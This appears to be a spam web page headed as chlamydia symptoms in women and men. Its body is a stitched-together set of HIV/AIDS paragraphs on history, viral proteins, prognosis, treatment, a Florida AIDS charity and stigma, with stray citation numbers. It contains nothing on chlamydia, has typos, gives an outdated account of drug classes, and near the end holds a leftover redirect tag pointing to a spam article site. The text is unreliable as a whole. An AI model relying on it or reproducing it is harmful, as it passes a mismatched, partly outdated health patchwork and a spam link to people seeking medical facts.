“Chlamydia Signs In Women -Symptoms Of Chlamydia In A Man”

Definition (NCI_NCI-GLOSS) A disease caused by human immunodeficiency virus (HIV). People with acquired immunodeficiency syndrome are at an increased risk for developing certain cancers and for infections that usually occur only in individuals with a weak immune system.

In the United States, HIV disease was first described in 1981 among 2 groups, one in San Francisco and the other in New York City. Numerous young homosexual men presented with opportunistic infections that, at the time, were typically associated with severe immune deficiency: Pneumocystis pneumonia (PCP) and aggressive Kaposi sarcoma. [16]

There are complete copies of HIV genetic material among the strands of mRNAs produced by the cell. These gather together with newly made HIV proteins and enzymes to form new viral particles, which are then released from the cell. The enzyme protease plays a vitla role at this stage of HIV’s life cycle by cutting down long strands of protein into smaller pieces, which are used to construct mature viral cores.

People with HIV infection should be under the care of a physician who is experienced in treating HIV infection. This is often an infectious-disease subspecialist, but may be a health-care provider, such as an internal medicine or pediatric specialist, who has special certification in HIV treatment. All people with HIV should be counseled about avoiding the spread of the disease. Infected individuals are also educated about the disease process, and attempts are made to improve the quality of their life.

The Island Coast AIDS Network (ICAN) was founded in 1987 and incorporated as a not for profit corporation in 1989. Its mission is “To stop the spread of HIV/AIDS and assist individuals infected and affected in Southwest Florida.” As a community based AIDS service organization, ICAN provides a wide variety of services to its clients as well as the general public.

The Centers for Disease Control reported cases of Pneumocystis carinii pneumonia and Kaposi’s sarcoma in otherwise healthy young male homosexuals in 1981. Until then, pneumocystis carinii was mainly known to occur in immunodepressed patients after organ transplants or suffering from congenital immunodeficiencies. Soon thereafter, the same condition was seen in IV drug abusers, haemophilliacs and babies of IV drug abusing mothers. These patients had profound immunosuppression due to the depletion of T4 helper lymphocytes and the name ‘acquired immunodeficiency’ was coined for this syndrome. Epidemiological studies have now established that the disease is infectious and can be transmitted by sexual intercourse, blood or blood products. The lymphocytes of patients died early, creating a difficulty in isolating the virus. Montagnier and Gallo eventually isolated the virus in 1984 and HIV-2 was isolated in 1986 from West Africa. HIV-1 and HIV-2 do not cross-react serologically with each other in screening tests. (sources: Avert, Virology-Online)

HIV/AIDS has become a chronic rather than an acutely fatal disease in many areas of the world.[185] Prognosis varies between people, and both the CD4 count and viral load are useful for predicted outcomes.[28] Without treatment, average survival time after infection with HIV is estimated to be 9 to 11 years, depending on the HIV subtype.[15] After the diagnosis of AIDS, if treatment is not available, survival ranges between 6 and 19 months.[186][187] HAART and appropriate prevention of opportunistic infections reduces the death rate by 80%, and raises the life expectancy for a newly diagnosed young adult to 20–50 years.[185][188][189] This is between two thirds[188] and nearly that of the general population.[29][190] If treatment is started late in the infection, prognosis is not as good:[29] for example, if treatment is begun following the diagnosis of AIDS, life expectancy is ~10–40 years.[29][185] Half of infants born with HIV die before two years of age without treatment.[167]

And having herpes can also be a risk factor for contracting HIV. This is because genital herpes can cause ulcers that make it easier for HIV to enter the body during sex. And people who have HIV tend to have more severe herpes outbreaks more often because HIV weakens the immune system.

HIV/AIDS can be diagnosed via a blood test to see the presence of antibodies to the HIV virus. Blood given for donation in many places is screened for HIV before it is administered to patients, as blood transfusion can be one mode of transmission of the HIV virus. HIV/AIDS patients face many serious health conditions. For example, they are more prone to cancers which can be aggressive and devastating. Sometimes, individuals may not be able to carry out their normal lifestyles, while in other cases, individuals may bouts of illness and then a calm. There are two general classes of drugs used to treat HIV/AIDS: nucleoside reverse transcriptase inhibitors and protease inhibitors. The first class works during the replication of the virus while the second influences the virus life cycle later on.

The two Tat proteins (p16 and p14) are transcriptional transactivators for the LTR promoter acting by binding the TAR RNA element. The TAR may also be processed into microRNAs that regulate the apoptosis genes ERCC1 and IER3.[34][35] The Rev protein (p19) is involved in shuttling RNAs from the nucleus and the cytoplasm by binding to the RRE RNA element. The Vif protein (p23) prevents the action of APOBEC3G (a cellular protein that deaminates Cytidine to Uridine in the single stranded viral DNA and/or interferes with reverse transcription[36]). The Vpr protein (p14) arrests cell division at G2/M. The Nef protein (p27) down-regulates CD4 (the major viral receptor), as well as the MHC class I and class II molecules.[37][38][39]

A considerable amount of stigma has been attached to HIV infection, mostly because of the virus’s association with sexual acquisition and the inference of sexual promiscuity. Consequences of this stigma have included discrimination and reluctance to be tested for HIV infection. The stigma of HIV infection is also associated with a fear of acquiring a rapidly fatal infection from relatively casual contact. [redirect url=’http://penetratearticles.info/bump’ sec=’7′]

Humoral: Antibodies to HIV are usually measurable within a few weeks after primary infection; however, antibodies cannot fully control HIV infection because mutated forms of HIV that are not controlled by the patient’s current anti-HIV antibodies are generated.
